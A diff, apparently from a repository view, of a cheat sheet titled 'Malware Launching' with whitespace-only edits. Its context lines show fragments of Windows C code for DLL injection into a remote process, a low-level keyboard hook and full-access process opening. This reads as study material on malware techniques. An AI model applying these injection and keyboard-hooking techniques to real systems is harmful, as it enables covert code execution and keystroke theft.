|
@@ -1,5 +1,5 @@
|
|
|
---
|
|
|
-title: malware_launching.md
|
|
|
+title: Malware Launching
|
|
|
categories: [cheatsheets]
|
|
|
---
|
|
|
# Covert Process Launching
|
|
@@ -27,7 +27,7 @@ categories: [cheatsheets]
|
|
|
|
|
|
|
|
|
int main() {
|
|
|
-
|
|
|
+
|
|
|
|
|
|
const DWORD pid = 11428;
|
|
|
char *dllName = "H:\awesome.dll";
|
|
@@ -68,7 +68,7 @@ int main() {
|
|
|
printf("[+] Wrote String in Memory
|
|
|
");
|
|
|
|
|
|
- HMODULE hKernel32 = GetModuleHandle("kernel32.dll");
|
|
|
+ HMODULE hKernel32 = GetModuleHandle("kernel32.dll");
|
|
|
|
|
|
if(!hKernel32) {
|
|
|
printf("[-] No Handle to Kernel32.dll");
|
|
@@ -133,7 +133,7 @@ int main() {
|
|
|
2. Remote Hooks - observe/manipulate messages for a remote Process
|
|
|
|
|
|
* Remote Hooks are split in two other types:
|
|
|
-1. High-Level Hooks - Hook Proc as exported function in a DLL, which is mapped by the OS
|
|
|
+1. High-Level Hooks - Hook Proc as exported function in a DLL, which is mapped by the OS
|
|
|
into ProcessSpace of one or more Threds
|
|
|
2. Low-Level Hooks - Hook Proc contained in the Process which installed the Hook
|
|
|
|
|
@@ -161,7 +161,7 @@ LRESULT CALLBACK LowLevelKeyboardProc(int nCode, WPARAM wParam, LPARAM lParam) {
|
|
|
|
|
|
|
|
|
int main() {
|
|
|
-
|
|
|
+
|
|
|
hookHandle =SetWindowsHookEx(WH_KEYBOARD_LL, LowLevelKeyboardProc, NULL, 0);
|
|
|
if(!own) {
|
|
|
printf("[-] No Hook for you :(
|
|
@@ -172,7 +172,7 @@ int main() {
|
|
|
MSG msg;
|
|
|
while (GetMessage(&msg, NULL, 0, 0))
|
|
|
{
|
|
|
- }
|
|
|
+ }
|
|
|
|
|
|
return 0;
|
|
|
}
|
|
@@ -196,7 +196,7 @@ Example
|
|
|
|
|
|
|
|
|
int main() {
|
|
|
-
|
|
|
+
|
|
|
int pid = 14464;
|
|
|
HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
|
|
|
|
|
@@ -236,7 +236,7 @@ int main() {
|
|
|
|
|
|
return 0;
|
|
|
}
|
|
|
-```
|
|
|
+```
|
|
|
|
|
|
|
|
|
### Detours
|